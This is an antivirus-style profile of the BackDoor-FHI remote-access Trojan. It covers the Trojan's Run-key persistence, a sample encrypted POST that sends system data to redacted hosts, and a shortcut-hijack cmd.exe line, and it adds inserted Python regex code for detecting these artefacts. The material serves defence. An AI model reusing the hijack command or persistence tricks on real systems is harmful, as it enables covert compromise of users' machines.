Virus Profile: BackDoor-FHI

Risk Assessment: Home Low | Corporate Low
Date Discovered: 8/3/2012
Date Added: 8/3/2012
Origin: N/A
Length: Varies
Type: Trojan
Subtype: Remote Access
DAT Required: 6792


This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.


  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA

Indication of Infection

Presence of the above-mentioned activities.

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

Virus Characteristics

Upon execution, the Trojan drops itself to the following path.
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI also drops copies of itself in random locations under the name ‘thumbs.db[random character]’.

The following registry value has been added to the system so that the Trojan executes automatically at startup:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    "{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[Random]\ [random].exe /r

The Trojan injects its own code into many processes chosen at random and tries to connect to the following malicious hosts:

  • www.g[Removed]
  • www.e[Removed]
  • so[Removed]
  • www-pro[Removed]
  • esto[Removed]

Note: The above-mentioned URLs may vary with the geographical location in which the malicious content is executed.

The malware posts encrypted system information to the sites above, using a request of the following form:

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...

The malware may also create or modify existing document shortcut (.lnk) files so that their command line follows a format similar to the one below:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

The malware will then open the copy prior to opening the original target.
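Added detection logic for the two persistence artefacts described above (the GUID-named Run value and the hijacked shortcut command line). This is example code written for this profile, not McAfee's own; the regexes are derived from the patterns quoted in the text, and the directory names and shortcut path in the samples are constructed.

```python
import re

# Run-key persistence: a GUID-named value whose data is
# %UserProfile%\Application Data\<random>\<random>.exe /r
RUN_VALUE_RE = re.compile(
    r'^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$', re.IGNORECASE)
RUN_DATA_RE = re.compile(
    r'^%UserProfile%\\Application Data\\[^\\]+\\\s*[^\\]+\.exe\s+/r$',
    re.IGNORECASE)

# LNK hijack: the shortcut runs cmd.exe, starts the dropped "thumbs.db<one char>"
# copy if it exists, and only then starts the original target.
LNK_HIJACK_RE = re.compile(
    r'cmd\.exe\s+/C\s+if\s+exist\s+(?P<copy>\S+thumbs\.db\S?)\s+start\s+(?P=copy)'
    r'\s*&&\s*start\s+""\s*"(?P<orig>[^"]+)"',
    re.IGNORECASE)


def suspicious_run_entries(run_values):
    """Return (name, data) pairs from HKCU\\...\\Run that match the profile."""
    return [(name, data) for name, data in run_values.items()
            if RUN_VALUE_RE.match(name) and RUN_DATA_RE.match(data)]


def hijacked_lnk_target(arguments):
    """Return (dropped_copy, original_target) if a shortcut's argument string
    matches the hijack pattern, otherwise None."""
    m = LNK_HIJACK_RE.search(arguments)
    if not m:
        return None
    return m.group('copy'), m.group('orig')


# Constructed samples; the random folder/file names and C:\Docs path are invented.
SAMPLE_RUN_VALUES = {
    '{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}':
        r'%UserProfile%\Application Data\qkzr\wvtn.exe /r',
    'Updater': r'"C:\Program Files\Vendor\updater.exe" /background',
}
SAMPLE_LNK_ARGS = (
    r'/C start cmd.exe /C if exist C:\Docs\thumbs.dbF start C:\Docs\thumbs.dbF '
    r'&& start ""  "OriginalApp.exe"'
)

if __name__ == '__main__':
    print(suspicious_run_entries(SAMPLE_RUN_VALUES))
    print(hijacked_lnk_target(SAMPLE_LNK_ARGS))
```

On a live host the same functions can be fed the values enumerated from the Run key and the argument strings of each .lnk file in the user's document folders.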

This Trojan is designed to download further malicious content from websites and infect the compromised system.


All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be successfully removed when cleaning with the recommended engine and DAT combination (or higher).

